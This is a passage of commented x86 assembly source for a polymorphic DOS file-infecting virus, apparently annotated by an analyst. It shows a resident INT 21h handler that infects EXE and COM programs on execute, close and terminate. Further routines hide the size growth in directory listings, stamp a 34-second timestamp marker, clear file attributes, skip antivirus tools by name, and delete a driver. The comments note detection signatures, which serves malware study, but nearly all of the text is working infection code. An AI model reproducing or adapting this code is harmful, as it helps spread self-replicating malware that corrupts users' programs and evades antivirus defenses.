AND AL, 00011111b
CMP AL, 00010001b ; 34 seconds?
JNE Exit_Size_Stealth
SUB WORD PTR ES:[BX+1AH], (Virus_Size + 70)
SBB WORD PTR ES:[BX+1CH], 0
Exit_Size_Stealth:
POP ES
POP BX
POP AX
POPF
RETF 2
;
; Size_Stealth - entry from NewInt21h for the directory-search functions
; (AH = 11h/12h FCB find, 4Eh/4Fh handle find). Records which function is
; being serviced so Stealth_Filesize (outside this chunk) can patch the
; matching record layout, then jumps there. Stealth_Filesize presumably
; leaves through Exit_Size_Stealth above (POPF / RETF 2), which balances
; NewInt21h's PUSHF.
;
Size_Stealth: MOV CS:Function_i21h, AH ; Save function # - written into the data byte embedded below.
JMP Stealth_Filesize
Function_i21h DB 4Eh ; Data byte in the code stream; initial value 4Eh (Findfirst, handle).
;
; Residency_Check - answers the "are you there?" call (INT 21h with
; AX = 0FE23h, dispatched from NewInt21h) by returning AX = 0Dh.
; POPF balances NewInt21h's PUSHF; RETF 2 discards the flags word the
; caller's INT pushed, so the original handler is never reached.
; Analyst note: this request/response pair is a usable in-memory signature.
;
Residency_Check:
MOV AX, 0Dh ; Return our sign.
POPF
RETF 2
;
; NewInt21h - the virus's resident INT 21h handler. Dispatches on AH/AX:
;   AX = 0FE23h          -> Residency_Check (answers AX = 0Dh)
;   AH = 36h             -> Stealth_DiskSpace (JMP, never returns here)
;   AH = 4Ch/31h/00h     -> Check_PSP_Infect (terminating program's image)
;   AX = 4B00h           -> Infect_Exec, then the EXEC itself is chained
;   AH = 11h/12h/4Eh/4Fh -> Size_Stealth (hide the growth in directory listings)
;   AH = 3Dh             -> Clean_File, then the open is chained
;   AH = 3Eh             -> Infect_Close; returns straight to the caller
;   anything else        -> JMP through CS:Int21h (the saved far pointer,
;                           presumably the previous vector).
; The PUSHF at entry is balanced by a POPF on every exit path (some of them
; inside routines outside this chunk). Note the 3Eh path never reaches the
; original handler, so Infect_Close (not visible) must perform the real close.
; Analyst notes: the 0FE23h/0Dh exchange and the interception of the four
; find functions are the detection-relevant behaviours here.
;
NewInt21h:
PUSHF
CMP AX, 0FE23h ; Residency-check.
JE Residency_Check
CMP AH, 36h ; Get free diskspace.
JNE Check_Next_3
JMP Stealth_DiskSpace ; Not a CALL: that routine owns the exit path.
Check_Next_3:
CMP AH, 4Ch ; Program terminate.
JE Check_PSP_Infect
CMP AH, 31h ; Terminate & stay resident.
JE Check_PSP_Infect
CMP AH, 00h ; Terminate program.
JE Check_PSP_Infect
CMP AX, 4B00h ; Program execute.
JNE Check_Next_4
CALL Infect_Exec ; Infect first; the (now infected) file is then executed by DOS via LOC_39.
Check_Next_4:
CMP AH, 11h ; Findfirst (FCB).
JE Size_Stealth
CMP AH, 12h ; Findnext (FCB).
JE Size_Stealth
CMP AH, 4Eh ; Findfirst (handle).
JE Size_Stealth
CMP AH, 4Fh ; Findnext (handle).
JE Size_Stealth
CMP AH, 3Dh ; Open file (handle).
JNE Check_Next_5
CALL Clean_File ; Not visible here; presumably disinfects the file being opened.
Check_Next_5:
CMP AH, 3Eh ; Close file (handle).
JNE LOC_39
POPF
CALL Infect_Close
RETF 2 ; Return to caller (original handler bypassed on this path).
LOC_39:
POPF
JMP DWORD PTR CS:Int21h ; Chain to the saved handler.
;
; Check_PSP_Infect - reached from NewInt21h on program termination
; (AH = 4Ch, 31h or 00h). Clears every bit of Flags except bit 2, locates
; the terminating program's own executable through its environment block,
; opens it and hands the handle to Infect_Close. The terminate request is
; then forwarded to Traced_Int21h (the traced entry) rather than the chained
; Int21h vector. All registers it touches are saved/restored; POPF balances
; NewInt21h's PUSHF.
;
Check_PSP_Infect:
AND CS:Flags, 00000100b ; Keep only bit 2 (its meaning is not visible here; it gates EXE infection in Infect_Exec).
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH DI
PUSH ES
PUSH DS
MOV AH, 62h ; Get PSP (BX = PSP segment) via the traced entry, bypassing other hooks.
CALL Traced_i21h
JC Exit_PSP_Check
CLD
MOV ES, BX
MOV ES, ES:[2Ch] ; PSP+2Ch = environment block segment (DOS PSP layout).
XOR DI, DI
MOV AL, 00h
LOC_41: ; Find the double NUL that ends the environment strings.
MOV CX, 0FFFFh ; Unbounded scan: nothing checks that a terminator exists.
REPNE SCASB ; Skip past the next NUL.
CMP ES:[DI], AL ; Immediately followed by another NUL?
JNE LOC_41 ; No - that was only a string terminator.
ADD DI, 03h ; Skip the 2nd NUL and the 2-byte string count -> ASCIIZ program path (DOS 3+ layout).
MOV DX, DI
PUSH ES
POP DS ; DS:DX = the program's own path.
MOV AX, 3D00h ; Open file... (read-only)
CALL Traced_i21h
JC Exit_PSP_Check
MOV BX, AX ; And infect it on closing (Infect_Close is outside this chunk).
CALL Infect_Close
Exit_PSP_Check:
POP DS
POP ES
POP DI
POP DX
POP CX
POP BX
POP AX
POPF
JMP DWORD PTR CS:Traced_Int21h ; Forward the terminate to the traced entry.
; AX = 4B00h
;
; Infect_Exec - called from NewInt21h before an EXEC (AX = 4B00h) is chained.
; In:  DS:DX = ASCIIZ path of the program about to run (the caller's EXEC
;      arguments); all other registers are the caller's.
; Out: nothing; every register is saved/restored. Side effects on disk: the
;      file may be infected (EXE or COM), its timestamp put back with the
;      seconds field forced to 34 s (the infection marker), attributes restored.
; Helpers outside this chunk: Check_To_Del_Driver, Set_Dummy_Handlers /
; Restore_Dummy_Handlers, Check_FileName (CF = leave alone, BX = name length),
; Check_Infect, Infect_EXE / Infect_COM, SUB_41, Traced_i21h.
; Analyst notes: the seconds/2 field = 11h (34 s) marker is how the virus
; recognises its own infections, here and in the size stealth above; files
; whose names trip Check_FileName/SUB_14 (AV tools, COMMAND.*) are skipped.
;
Infect_Exec:
PUSH AX ; Save registers.
PUSH BX
PUSH CX
PUSH DX
PUSH ES
PUSH DS
PUSH DI
PUSH SI
CALL Check_To_Del_Driver
CALL Set_Dummy_Handlers ; Presumably installs temporary error handlers - not visible here.
CALL Save_FileAttr ; Uses DS:DX (the path): saves the attributes, then clears them.
CALL Check_FileName ; CF = leave this file alone; BX = name length (its body is cut off below).
PUSHF ; Preserve that CF across the copy.
PUSH DS
PUSH CS
POP DS
MOV DI, 0
ORG $-2 ; Back up over the immediate: the next DW overlays it, so this is MOV DI, OFFSET FileName1
Gaby1 DW OFFSET FileName1 ; with the operand exposed as the patchable word Gaby1.
MOV SI, OFFSET FileName2
ADD BX, 04h ; Name length + 4 (presumably undoing SUB_14's SUB BX,4).
MOV CX, BX
REP MOVSB ; Copy FileName2 -> ES:FileName1. ES is whatever Check_FileName left (assumed CS; not visible).
POP DS
POPF
JC Exit_Infect_Exec ; Special file? NB: BX still holds the length, so the close at the exit acts on that handle number.
MOV AX, 3D02h ; Open file r/w.
CALL Traced_i21h ; No error check: on failure AX is a DOS error code...
XCHG BX, AX ; BX = Filehandle. (...or that error code, used as the handle from here on.)
CALL Save_FileTime ; Trace_Int = time word, Trace_Int+2 = date word.
MOV AX, CS:Trace_Int ; Get filetime.
AND AL, 00011111b ; Mask seconds/2 field (bits 0-4 of the DOS time word).
PUSH AX
MOV AH, 3Fh ; Read header.
MOV CX, 28 ; First 28 bytes of the MZ header (through e_ovno: SS:SP, CS:IP, reloc offset).
PUSH CS
POP DS
PUSH DS
POP ES
MOV DX, OFFSET Buffer
CALL Traced_i21h
MOV SI, DX
CLD
LODSW ; Get 1st word from header.
CMP AX, 'ZM' ; "MZ" on disk (word immediates are byte-swapped)?
JE Is_EXE
CMP AX, 'MZ' ; "ZM" on disk? (DOS accepts both spellings.)
JNE Is_COM ; Else it's a .COM-file.
Is_EXE:
POP AX ; POP filetime.
TEST Flags, 00000100b ; EXE infection only when Flags bit 2 is set.
JZ LOC_44
CMP AL, 11h ; Already carries the 34 s marker?
JE LOC_47
CALL Infect_EXE
JNC LOC_46 ; Success: stamp the marker.
JMP Exit_Infect_Exec ; Failure: timestamp is not rewritten.
LOC_44: ; Bit 2 clear: no EXE infection; only already-marked files get SUB_41.
CMP AL, 11h
JNE LOC_47
CALL SUB_41 ; Purpose not visible here.
JNC LOC_47
JMP Exit_Infect_Exec
Is_COM:
POP AX ; AX = Filetime.
CMP AL, 11h ; 34 seconds, infected?
JE Exit_Infect_Exec
CALL Infect_COM
JC LOC_47 ; Not infected: just put the original time back.
LOC_46:
MOV AX, Trace_Int ; Set infected timestamp.
AND AL, 11100000b ; Clear the seconds/2 field...
OR AL, 11h ; 34 seconds. (...and set it to 11h.)
MOV Trace_Int, AX
LOC_47:
CALL Restore_FileTime ; Time/date look untouched apart from the seconds.
Exit_Infect_Exec:
MOV AH, 3Eh ; Close file (BX = handle - or whatever BX holds on the early-exit paths).
CALL Traced_i21h
CALL Restore_FileAttr
CALL Restore_Dummy_Handlers
POP SI ; Restore registers.
POP DI
POP DS
POP ES
POP DX
POP CX
POP BX
POP AX
RETN
; Checks if INT 13h part is resident, and deletes portdriver if so.
;
; Check_To_Del_Driver - the first Del_PortDriver call below is unconditional;
; only the second one is guarded by the Windows / INT 13h checks. Under
; Windows 4.x (95) with the virus's INT 13h component resident, a failed
; deletion (CF set) falls back to Unslice_Int13h. What the "port driver" is
; and what Del_PortDriver / Unslice_Int13h do is outside this chunk.
; Clobbers AX, BX (INT 2Fh/160Ah also returns CX = mode per its spec).
; Analyst note: INT 13h called with AX = 5445h ("TE") answering AX = 4554h
; ("ET") is the INT 13h component's residency check - an in-memory signature.
;
Check_To_Del_Driver:
CALL Del_PortDriver ; Always.
MOV AX, 160Ah ; Identify Windows version
INT 2Fh ; and type. AX = 0 if supported, BX = version (BH major).
OR AX, AX ; Legal function?
JNZ Exit_Del_PortDriver
CMP BH, 04h ; Windows ver. 4 or higher?
JB Exit_Del_PortDriver
MOV AX, 5445h ; INT 13h residency-check.
INT 13h
CMP AX, 4554h ; INT 13h part installed?
JNE Exit_Del_PortDriver
CALL Del_PortDriver ; Second attempt, only when the INT 13h part is resident.
JC LOC_49 ; File not found?
RETN
LOC_49:
CALL Unslice_Int13h
Exit_Del_PortDriver:
RETN
;
; Infect_EXE - appends the virus to an MZ executable and rewrites its header.
; In:  DX = OFFSET Buffer holding the first 28 header bytes (read by
;      Infect_Exec); BX = file handle; DS = ES = CS. Reloc_Offs, Init_IP and
;      Init_SS are presumably labels into that buffer (not visible here).
; Out: CF set if the file is left alone: new-format header, Check_Infect
;      rejects it, header-declared length differs from the real length
;      (overlay), or Poly_Engine fails. Otherwise the patched header has been
;      written back and CF is whatever that write returned; the body itself
;      is written by Poly_Engine (outside this chunk).
; Clobbers AX, CX, DX, SI, DI, Temp1, FileTime, Old_*, Host_*, Padding.
;
Infect_EXE:
CMP Reloc_Offs, 40h ; PE-header? (e_lfarlc = 40h marks a new-format NE/LE/PE file.)
JNE LOC_52
STC ; Leave those alone.
LOC_51:
JMP Exit_Infect_EXE
LOC_52:
MOV DI, OFFSET Old_Entry ; Save old CS:IP.
MOV SI, OFFSET Init_IP
MOVSW ; IP
MOVSW ; CS
MOV SI, OFFSET Init_SS ; Save old SS:SP.
MOV DI, OFFSET Old_Stack+2
MOVSW ; SS -> Old_Stack+2
SUB DI, 04h
MOVSW ; SP -> Old_Stack (kept as a far pointer SS:SP).
MOV SI, DX ; Buffer.
MOV Host_Type, 01h ; Host is .EXE-file.
CALL Check_Infect ; Suitable for infection?
JC LOC_51 ; CF set if not.
MOV AX, Trace_Int ; Save time.
MOV FileTime, AX
MOV AX, [SI+2] ; Filesize MOD 512 (e_cblp).
MOV Old_Mod512, AX
MOV AX, [SI+4] ; File in 512-byte pages (e_cp).
MOV Old_Byte_Pages, AX
MOV AX, [SI+4] ;
MOV DX, 512
CMP WORD PTR [SI+2], 0 ; No rounding? (e_cblp = 0: last page is full)
JE LOC_53
DEC AX ; Partial last page: count full pages only.
LOC_53:
MUL DX ; Calculate filesize: DX:AX = full pages * 512.
MOV Temp1+2, DX
MOV DX, [SI+2]
ADD AX, DX ; Plus filesize MOD 512.
ADC Temp1+2, 00h
MOV Temp1, AX ; Temp1 = header-declared length (dword).
PUSH AX
XOR CX, CX ; Go to end of file.
MOV DX, CX ; DX:AX = Filesize.
MOV AX, 4202h
CALL Traced_i21h
SUB AX, Temp1 ; Same size as in header?
JZ Good_Size_Lo ; (ie. no internal overlay?).
POP AX
STC
JMP Exit_Infect_EXE
Good_Size_Lo:
SUB DX, Temp1+2 ; Same size as in header?
JZ Good_Size_Hi
POP AX
STC
JMP Exit_Infect_EXE
Good_Size_Hi:
POP AX ; Filesize low.
MOV CX, Temp1+2 ; Filesize high.
MOV DX, AX
MOV AX, 4200h ; Go to end file (seek to the declared length, which equals the real end).
CALL Traced_i21h
MOV AX, 1E7Bh ; 7803 = bytes the file is about to grow by.
MOV DX, [SI+2] ; Filesize MOD 512.
ADD DX, AX ; DX = last-page bytes + growth.
LOC_56: ; Fold the growth into the page count, 512 bytes at a time.
INC WORD PTR [SI+4] ; Filesize in 512-byte pages.
SUB DX, 512
CMP DX, 512
JA LOC_56
JNE LOC_57
XOR DX, DX ; Exactly one full page left: e_cblp = 0.
LOC_57:
MOV [SI+2], DX ; New e_cblp.
MOV AX, [SI+8] ; Size header in paragraphs (e_cparhdr).
MOV CX, 16
MUL CX ; Calculate headersize bytes.
MOV CX, Temp1 ; Filesize minus headersize.
SUB CX, AX
SBB Temp1+2, DX
MOV DI, Temp1+2 ; Filesize high. (DI:CX = load-module length)
MOV SI, CX ; Filesize low.
MOV DX, DI
MOV AX, SI
MOV CX, 16
DIV CX ; Filesize DIV 16: AX = paragraphs, DX = remainder 0-15. (Would fault if DX >= 16 here, i.e. module >= 1 MB, unless Check_Infect bounds it.)
MOV DI, AX ; New CS, relative to the load module.
MOV SI, DX
MOV Host_Entrypoint, SI
MOV Padding, SI ; 0 - 15 bytes padding.
ADD SI, OFFSET Buffer ; Plus end of virus -> new IP.
MOV Temp1, SI
MOV Temp1+2, DI
CLD ; Set host's new entrypoint.
MOV SI, OFFSET Temp1
MOV DI, OFFSET Init_IP
MOVSW ; IP
MOVSW ; CS
CALL Poly_Engine ; Polymorphic encryptor (presumably writes the body at the current position).
JC Exit_Infect_EXE
XOR CX, CX ; Go to start of file.
MOV DX, CX
MOV AX, 4200h
CALL Traced_i21h
CALL Make_Random_Stack ; Presumably fills in Init_SS/SP - not visible here.
MOV DX, OFFSET Buffer ; Write updated header.
MOV AH, 40h
MOV CX, 28
CALL Traced_i21h ; CF of this write is what the caller (Infect_Exec) tests.
Exit_Infect_EXE:
RETN
;
; Infect_COM - appends the virus to a .COM host and replaces its first three
; bytes with a JMP to the appended code.
; In:  BX = file handle; DS = ES = CS; Buffer holds the host's first bytes
;      (read by Infect_Exec).
; Out: CF set if not infected: Check_Infect rejects it, length >= 64 KB,
;      shorter than 30 bytes, >= 55701 bytes, or Poly_Engine fails.
;      Otherwise CF is whatever the final 3-byte write returned.
; Clobbers AX, CX, DX, SI, DI; fills Host_Type, Host_COM_JMP,
; Host_Entrypoint, Padding, JMP_COM.
;
Infect_COM:
MOV Host_Type, 00h ; Set host as .COM-file.
CLD
MOV DI, OFFSET Host_COM_JMP
MOV SI, OFFSET Buffer
CALL Check_Infect ; Suitable for infection?
JC LOC_59
MOV CX, 3 ; Copy first 3 bytes of host
REP MOVSB ; to our storage-place (done before the size checks; harmless if the file is rejected).
MOV DX, CX ; CX is 0 after REP, so CX:DX = 0 -> Go to end of file.
MOV AX, 4202h ; DX:AX = Filesize.
CALL Traced_i21h
OR DX, DX ; File under 64k?
JZ LOC_60
LOC_59:
STC
JMP Exit_Infect_COM
LOC_60:
CMP AX, 30 ; File too small?
JB LOC_59
XOR CX, CX ; Go to end of file (again; the position is already there).
MOV DX, CX ; DX:AX = Filesize.
MOV AX, 4202h
CALL Traced_i21h
CMP AX, 55701 ; File too big? (55701 + 7803 appended stays below the 64 KB .COM limit - presumably the reason.)
JB LOC_61
STC ; Set carry-flag (error).
JMP Exit_Infect_COM
LOC_61:
MOV Host_Entrypoint, AX ; Host length...
ADD Host_Entrypoint, 100h ; ...+ 100h = offset of the appended code once loaded.
MOV Padding, AX ; Virus entrypoint.
ADD Padding, 100h ; Plus .COM-entrypoint.
MOV DI, OFFSET JMP_COM
MOV BYTE PTR [DI], 0E9h ; JMP opcode.
SUB AX, 3 ; Minus displacement (rel16 is relative to the byte after the 3-byte JMP).
ADD AX, Virus_Size ; Plus entrypoint: lands Virus_Size bytes into the appended data.
MOV [DI+1], AX ; Store it.
CALL Poly_Engine ; Append polymorphic copy.
JC Exit_Infect_COM
XOR CX, CX ; Go to start file.
MOV DX, CX
MOV AX, 4200h
CALL Traced_i21h
MOV CX, 3 ; Write JMP Virus to start
MOV DX, OFFSET JMP_COM ; of .COM-file.
MOV AH, 40h
CALL Traced_i21h ; CF of this write is what the caller tests.
Exit_Infect_COM:
RETN
;
; Save_FileTime - reads the open file's timestamp (INT 21h/5700h, BX = handle)
; and parks it in the Trace_Int storage (time word at Trace_Int, date word at
; Trace_Int+2 - reused despite the name). Clobbers AX, CX, DX.
;
Save_FileTime:
MOV AX, 5700h ; Get filetime.
CALL Traced_i21h
MOV CS:Trace_Int, CX ; Time word.
MOV CS:Trace_Int+2, DX ; Date word.
RETN
;
; Restore_FileTime - writes the saved (possibly marker-adjusted) time/date
; back to the open file (INT 21h/5701h, BX = handle) so the modification
; time shows no change. Clobbers AX, CX, DX.
;
Restore_FileTime:
MOV AX, 5701h ; Set timestamp.
MOV CX, CS:Trace_Int ; Time word.
MOV DX, CS:Trace_Int+2 ; Date word.
CALL Traced_i21h
RETN
;
; Saves file attributes, and clears them afterwards.
; In: DS:DX = ASCIIZ filename (INT 21h/4300h-4301h take a path, not a
;     handle; the old "BX = Filehandle" note was wrong - this runs before
;     the file is opened).
; The attribute word is parked in CodeSegment (storage reused despite its
; name). Setting attributes to 0 drops read-only/hidden/system so the
; r/w open that follows succeeds. Clobbers AX, CX.
;
Save_FileAttr:
MOV AX, 4300h ; Get file-attributes.
CALL Traced_i21h
MOV CS:CodeSegment, CX
MOV AX, 4301h ; Clear file-attributes.
XOR CX, CX
CALL Traced_i21h
RETN
;
; Restore_FileAttr - puts the attributes saved by Save_FileAttr back
; (INT 21h/4301h; DS:DX must still name the same file). Clobbers AX, CX.
;
Restore_FileAttr:
MOV AX, 4301h ; Set file-attributes.
MOV CX, CS:CodeSegment
CALL Traced_i21h
RETN
;
; SUB_14 - name-based "do not infect" filter on the copy of the filename in
; CS:FileName2 (presumably called from Check_FileName, whose body is cut off
; below).
; In:  BX = filename length including the extension.
; Out: CF set = leave the file alone. Flags bit 0 is set for F-Prot /
;      InVircible (CF set), bit 1 for CHKDSK (CF clear, as left by the CMP).
;      BX is reduced by 4. Word immediates are byte-swapped: 'BT' is "TB"
;      on disk, '-F' is "F-", 'VI' is "IV", 'HC' is "CH".
; Refuses names starting TB (ThunderByte), F-, IV; any name containing a
; 'V'; and names matching Command_Com. Clobbers AX, CX, SI, DI, Flags.
; Analyst note: a crude anti-AV heuristic - files named like this are
; expected to stay clean on an infected system.
;
SUB_14:
PUSH DS
PUSH CS
POP DS
CLD
MOV SI, OFFSET FileName2
SUB BX, 4 ; Strip ".ext": BX = base-name length.
JC LOC_63 ; Shorter than 4 characters: CF set, leave it.
MOV AX, [SI] ; First two characters.
CMP AX, 'BT' ; TBAV utilities? ("TB...")
STC ; STC does not touch ZF, so the JE still sees the CMP result...
JE LOC_63 ; ...and leaves with CF already set.
CMP AX, '-F' ; F-Prot? ("F-...")
JE LOC_65
CMP AX, 'VI' ; Invircible? ("IV...")
JE LOC_65
CMP AX, 'HC' ; CHKDSK.EXE ? ("CH...")
JE LOC_64
MOV AL, 'V' ; Filename contains a 'V' ?
MOV DI,OFFSET FileName2
MOV CX, BX
INC CX ; Scan base name plus one more byte.
REPNE SCASB
OR CX, CX ; Found? (CX stays nonzero only if the match came before the last scanned byte.)
STC
JNZ LOC_63 ; Then exit with carry set.
MOV DI, OFFSET FileName2 ; Filename is COMMAND.* ?
MOV SI, OFFSET Command_Com
MOV CX, BX
REPE CMPSB
OR CX, CX ; Found? (CX = 0 once all BX bytes were compared; a mismatch in the last byte alone also counts.)
STC
JZ LOC_63 ; Then exit with carry set.
CLC ; No match: may be infected.
LOC_63:
POP DS
RETN
LOC_64: ; CHKDSK: flag it (bit 1) but return with CF clear.
OR Flags, 00000010b
POP DS
RETN
LOC_65: ; F-Prot / InVircible: flag it (bit 0) and refuse.
OR Flags, 00000001b
STC
POP DS
RETN
Check_FileName:
PUSH DS
POP ES
XOR AL, AL
MOV DI, DX
XOR CX, CX
MOV CL, 0FFh
MOV BX, CX
CLD
REPNE SCASB ; Find end of ASCIIZ-string.
DEC DI
DEC DI
SUB BX, CX
MOV CX, BX
STD
MOV AL, '\'
REPNE SCASB ; Find start filename.
SUB BX, CX